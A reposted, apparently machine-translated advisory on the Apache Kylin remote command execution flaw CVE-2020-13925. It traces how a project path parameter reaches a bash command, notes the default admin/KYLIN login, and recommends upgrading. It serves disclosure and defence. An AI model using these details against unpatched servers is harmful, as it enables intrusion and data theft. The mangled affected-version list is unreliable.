Shulou(Shulou.com)05/31 Report--

This article introduces the Apache Kylin remote command execution vulnerability CVE-2020-13925 report, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Summary

In June, JD.com 's secure Blue Army team discovered a serious vulnerability in apache kylin remote command execution (CVE-2020-13925). Hackers can take advantage of this vulnerability to log on to any administrator account and password that has not been changed by default and gain administrator privileges. As Apache Kylin is widely used in the enterprise's big data analysis platform, the vulnerability will do great harm to the core data of the enterprise, and there is a risk of data leakage. Users are advised to upgrade the software to a secure version as soon as possible.

About Apache Kylin

Apache Kylin was founded and open source by eBay in 2013 and became a top-level project of the Apache Foundation in 2015. He is a widely used open source and distributed analytical data warehouse in the field of big data, which can provide SQL query interface and multi-dimensional analysis (OLAP) capability on Hadoop/Spark. In recent years, big data industry is in the ascendant, Apache Kylin is widely used by many large Internet enterprises at home and abroad, and is known by the industry as big data's "immortal beast".

Home page: https://kylin.apache.org/

Source code: https://github.com/apache/kylin

Authoritative Guide to Apache Kylin (2nd Edition): https://book.douban.com/subject/34804888/

Overview of vulnerabilities

The Kylin system provides a WEB UI that separates the front and rear ends, where users can manage projects, create models, analyze data, and so on.

The system provides a set of system diagnosis interfaces, which are used to obtain the diagnostic information of the project, task and operating system when a fault occurs, which is convenient for debugging.

The flaw lies in that two of the interfaces do not do a security check on the input parameters and are spliced into a string to be executed as system commands during subsequent use. Hackers can call the interface by constructing malicious parameter values to remotely execute arbitrary system commands and obtain the account authority of the operating system running the Apache Kylin system.

To call these two vulnerability interfaces, an account is required to log in to the WEB system, but because the WEB system will have a default administrator account admin after installation or deployment of the docker container, and will set a fixed default password "KYLIN", if the administrator does not modify it deliberately, the hacker can log in and exploit the vulnerability directly. It may also be used by hackers or mole who get account or Session in other ways to gain higher privileges.

Because Apache Kylin is a big data analysis platform, it needs to connect to data sources, and it may have direct access to core data in some large enterprises. If it is breached by hackers, it will cause high data security risks.

Loophole analysis

Let's take the last version 3.0.2 before the fix as an example to analyze the code:

Https://github.com/apache/kylin/tree/kylin-3.0.2

The vulnerability lies in two interfaces:

* / kylin/api/diag/project/ {project} / download * / kylin/api/diag/job/ {jobId} / download

The vulnerability paths of the two interfaces are the same. Let's take the first one as an example, code:

Https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/controller/DiagnosisController.java@RequestMapping(value = "/ project/ {project} / download", method = {RequestMethod.GET}, produces = {"application/json"}) @ ResponseBodypublic void dumpProjectDiagnosisInfo (@ PathVariable String project, final HttpServletRequest request, final HttpServletResponse response) {try (AutoDeleteDirectory diagDir = new AutoDeleteDirectory ("diag_project") "") {String filePath = dgService.dumpProjectDiagnosisInfo (project, diagDir.getFile ()) SetDownloadResponse (filePath, response);} catch (IOException e) {throw new InternalErrorException ("Failed to dump project diagnosis info. "+ e.getMessage (), e);} {project} is a path parameter that is mapped to the variable project and is passed directly into the dumpProjectDiagnosisInfo method of dgService without doing any processing: https://github.com/apache/kylin/blob/kylin-3.0.2/server-base/src/main/java/org/apache/kylin/rest/service/DiagnosisService.javapublic String dumpProjectDiagnosisInfo (String project, File exportPath) throws IOException {aclEvaluate.checkProjectOperationPermission (project) String [] args = {project, exportPath.getAbsolutePath ()}; runDiagnosisCLI (args); return getDiagnosisPackageName (exportPath);}

The project parameter is inserted into the args array and passed into runDiagnosisCLI, and you can tell from the method name that the command is about to be executed. But before that, there is an action checkProjectOperationPermission that checks whether the user has permission to operate the project:

Public void checkProjectOperationPermission (String projectName) {ProjectInstance projectInstance = getProjectInstance (projectName); aclUtil.hasProjectOperationPermission (projectInstance);} get project instanceprivate ProjectInstance getProjectInstance (String projectName) {return ProjectManager.getInstance (KylinConfig.getInstanceFromEnv ()) .getProject (projectName);} public ProjectInstance getProject (String projectName) {/ / Null check is needed for ConcurrentMap does not supporting .get (null) if (projectName = = null) return null; try (AutoLock lock = prjMapLock.lockForRead ()) {return projectMap.get (projectName) }}

This is actually queried in a map. If we enter project as poc or exp, which of course does not exist, we will return null, go back to the permission check entry checkProjectOperationPermission, get the projectInstance as null, and then input aclUtil.hasProjectOperationPermission:

@ PreAuthorize (Constant.ACCESS_HAS_ROLE_ADMIN + "or hasPermission (# project, 'ADMINISTRATION')" + "or hasPermission (# project,' MANAGEMENT')" + "or hasPermission (# project, 'OPERATION')") public boolean hasProjectOperationPermission (ProjectInstance project) {return true;}

This is interesting. Here, the user's identity is checked with PreAuthorize. As long as the user is admin or has administration/management/operation permission, true will be returned. It may be that the project permission function has not been implemented yet, so it is temporarily replaced by checking the user's identity.

Therefore, as long as the user has the above user identity or permissions, we can pass the permission check even if the project we entered does not exist.

Let's see how runDiagnosisCLI executes the command.

Private void runDiagnosisCLI (String [] args) throws IOException {Message msg = MsgPicker.getMsg (); File cwd = new File (""); logger.debug ("Current path: {}", cwd.getAbsolutePath ()); logger.debug ("DiagnosisInfoCLI args: {}", Arrays.toString (args)); File script = new File (KylinConfig.getKylinHome () + File.separator + "bin", "diag.sh") If (! script.exists ()) {throw new BadRequestException (String.format (Locale.ROOT, msg.getDIAG_NOT_FOUND (), script.getAbsolutePath ();} String diagCmd = script.getAbsolutePath () + "+ StringUtils.join (args,"); CliCommandExecutor executor = KylinConfig.getInstanceFromEnv () .getCliCommandExecutor (); Pair cmdOutput = executor.execute (diagCmd) If (cmdOutput.getFirst ()! = 0) {throw new BadRequestException (msg.getGENERATE_DIAG_PACKAGE_FAIL ());}} public Pair execute (String command) throws IOException {return execute (command, new SoutLogger ();} public Pair execute (String command, Logger logAppender) throws IOException {Pair r; if (remoteHost = = null) {r = runNativeCommand (command, logAppender);} else {r = runRemoteCommand (command, logAppender) } if (r.getFirst ()! = 0) throw new IOException ("OS command error exit with return code:" + r.getFirst () / / + ", error message:" + r.getSecond () + "The command is:\ n" + command + (remoteHost = = null? "": "(remoteHost:" + remoteHost + ")) / /); return r;}

Here is a remoteHost, which provides the ability to execute commands on other servers through ssh, but we don't use it in our scenario, enter runNativeCommand:

Private Pair runNativeCommand (String command, Logger logAppender) throws IOException {String [] cmd = new String [3]; String osName = System.getProperty ("os.name"); if (osName.startsWith ("Windows")) {cmd [0] = "cmd.exe"; cmd [1] = "/ C";} else {cmd [0] = "/ bin/bash"; cmd [1] = "- c" } cmd [2] = command; ProcessBuilder builder = new ProcessBuilder (cmd); builder.redirectErrorStream (true); Process proc = builder.start (); / /.}

Here the project parameter we entered is finally concatenated into a string and executed with java.lang.ProcessBuilder as a command.

Scope of influence

When the vulnerability was introduced:

2016-04-29

Affect the version:

3.0-2.3.2

4.0-2.4.1

5.0-2.5.2

6.0-2.6.4

0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0

Repair version:

3.1.0

Repair time:

2020-06-27

Repair scheme

Upgrade Apache Kylin system to the latest version.

Https://github.com/apache/kylin/releases

Https://hub.docker.com/r/apachekylin/apache-kylin-standalone/tags

On the Apache Kylin remote command execution vulnerability CVE-2020-13925 report is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.